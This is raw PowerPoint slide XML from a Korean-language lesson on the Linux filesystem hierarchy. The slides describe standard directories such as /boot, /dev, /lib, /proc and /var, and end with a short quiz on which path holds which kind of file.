                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>시스템에 사용되는 응용 프로그램들이 설치되는 디렉토리</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="사각형: 둥근 모서리 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2DCE005-2853-48B1-BAA1-77E63FDA952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응용 패키지 프로그램 설치 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="그룹 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BF5C38C-6269-4D59-9A7C-A5369356BFCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4319089" y="3061636"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="직사각형 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB41DAB3-C286-4D99-A592-EC58B46B18BF}"/>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/boot</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35EC8257-640D-4F86-9F0B-2241BCEACE07}"/>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커널이 저장되어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리눅스 부트에 필요한 부팅 지원 파일들</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="사각형: 둥근 모서리 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA367CB3-342B-46F3-95F5-538E0ECCD619}"/>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부팅 관련 파일 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRP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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="그룹 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1F48A66-85A2-4532-AA9B-B6801194013D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4319089" y="5525334"/>
            <a:ext cx="3664276" cy="1059652"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1059652"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="직사각형 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174AE4DA-36E7-497D-8588-2DF6B7281A59}"/>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/dev</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7D2BF4-40B5-4C51-90C1-FE9CBB30F952}"/>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장치 드라이버들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리눅스에서는 각종 장치들을 하나의 파일로 취급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 장치를 설치하는데 필요한 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>정보 저장</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="사각형: 둥근 모서리 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B6BB1F-0289-4065-A80D-0D85921A3A3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디바이스 장치 파일 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="그룹 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774F29DD-3899-462E-A32C-917463E58D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8155787" y="4291098"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="직사각형 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5ACD92-7C90-4010-A82D-8170CC27130D}"/>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/lib</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="TextBox 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DB8345-BFDD-4277-893B-688B0186EC9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프로그램들의 라이브러리들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대부분 공유 라이브러리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평소에는 파일 크기를 줄여서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라이브러리 실행 시 풀어서 사용</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="사각형: 둥근 모서리 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BA9BC7-8D35-4DFD-B46B-68D0E84557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공유 라이브러리 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53" name="그룹 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51BC519B-02C5-4850-82B5-62E79AAB6FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8155787" y="3061636"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="직사각형 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3367E09-49BC-4079-A387-FFB8979078F7}"/>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mnt</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="TextBox 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A222E4E4-56A4-4E92-BD41-CB4FC66E6D40}"/>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입출력 장치와 연결할 때 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>마운트하게</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 되면 해당 파일 시스템의 내용이 이 디렉토리에 저장됨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56" name="사각형: 둥근 모서리 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F192640-9628-42F4-999A-494D70D9281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입출력 장치 연결 마운트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sbin</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관리</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부팅</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복구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보수 등</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를 위한 명령어들</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운영에 필요한 명령어들 포함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만이 사용할 수 있는 명령어들로 구성</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운영 명령어 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="그룹 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EBB465-6195-4D4D-B476-B70753861828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8155787" y="5525334"/>
            <a:ext cx="3664276" cy="1056381"/>
            <a:chOff x="1520863" y="2529618"/>
            <a:chExt cx="3664276" cy="1056381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="직사각형 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DF1377A-259C-4BF0-B09E-E5B9790A430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/proc</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="TextBox 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77A644F-F155-4C5F-BB2D-27F0F1C027A8}"/>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프로세스와 프로그램 정보 및 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>하드웨어적인</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 정보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물리적인 하드디스크 용량을 사용하지 않고 커널에 의해 메모리에 저장됨</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="사각형: 둥근 모서리 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA7E051-526F-4AE0-B18C-AAEE0802502D}"/>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가상 파일 시스템 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="65" name="그룹 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F31DD37B-2C66-4863-B72A-A6C4E91F8DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="사각형: 둥근 모서리 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B296DD4-EAB8-4897-A9BB-31012B28E75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TextBox 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A278954A-4D3D-415A-8A95-C5EFEC00F1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8" name="화살표: 오른쪽 67">
              <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63A01F9-0D2F-4C75-8175-907AF0658A4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9" name="화살표: 오른쪽 68">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F06CBA-1B89-486F-8CBD-34FF4A8660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380462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8" name="그룹 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D2BC99-C4B4-41BF-BECE-C88F7C2AD8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2682932" y="3101682"/>
            <a:ext cx="682613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lost+found</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수행 중 파일시스템의 이상 유</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무를 진단하고 복구하는 프로그램인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>fsck</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(file system check</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에 의해 사용되는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일반 사용자 계정으로 로그인한 상태에서는 접근 불가</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계정인 </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로 접속해야 디렉토리의 내용을 볼 수 있음</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복구 프로그램인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>fsck</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>에 의해 사용되는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/var</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시스템에서 사용되는 동적인 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>변경되는 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>들 저장</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>각종 시스템 로그 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>사용자 로그인에 대한 보안 기록 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가변 자료 저장 디렉토리</a:t>
              </a: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tmp</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 수행 과정에서의 임시 파일들 저장</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파일 저장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/opt</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 제공되지 않는 프로그램을 추가로 설치할 경우 사용</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프로그램 추가 설치 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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E52962C2-4C27-4F36-A1D8-8B22FB740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29339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 시스템</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표준</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>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배움의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퀴즈를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>맞추시오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리눅스의 파일시스템 표준에 대해 알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6"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8" name="화살표: 오른쪽 27">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21455052-D21A-4F0E-9447-54E28263AA3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82789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21" name="타원 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EA3498-44D9-4126-8ADF-3899C1F69090}"/>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22" name="타원 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CCDF5A-85A5-4C98-9665-F315AF2A0CD8}"/>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23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F148B84A-1565-4608-9272-50A6A6565E4D}"/>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24" name="직선 화살표 연결선 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4610B8D-63E4-47ED-B185-FA21102B7FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22"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8FDFAA55-7EBF-4AC8-8AE6-8EDF8B763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10" y="1690688"/>
            <a:ext cx="8238727" cy="496898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77A51D5-22DB-475F-9EE7-7862374BCCB6}"/>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A5028EF-A74A-4D44-9757-A4DFA000DE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BCB728A-E4C5-453D-B698-1E5661DC40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C75D22BD-CB67-46A4-9A24-D1F7C35FA47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205918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4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0674FD72-038E-4245-96EE-CA4710BB00E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325284" y="2268428"/>
            <a:ext cx="11720338" cy="1857111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F743BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Question )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>리눅스 기본 명령어들을 보고 싶다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>리눅스 표준 계층구조 중 처음에 어떤 경로를 들어가야 하는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>컴퓨터에 누가 접속했는지 기록을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chemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>공유 라이브러리 디렉토리는 어떤 경로에 있는가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사용자가 설치한 응용 패키지 프로그램은 보통 어느 경로에 저장되는가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부팅 파일이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>재대로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> 복구되었는지 확인하고 싶다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> 리눅스 표준 계층구조 중 처음에 어떤 경로를 들어가야 하는가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C70C07D-FD6C-450F-A764-A39C1D752847}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7724277" y="2719305"/>
            <a:ext cx="966281" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
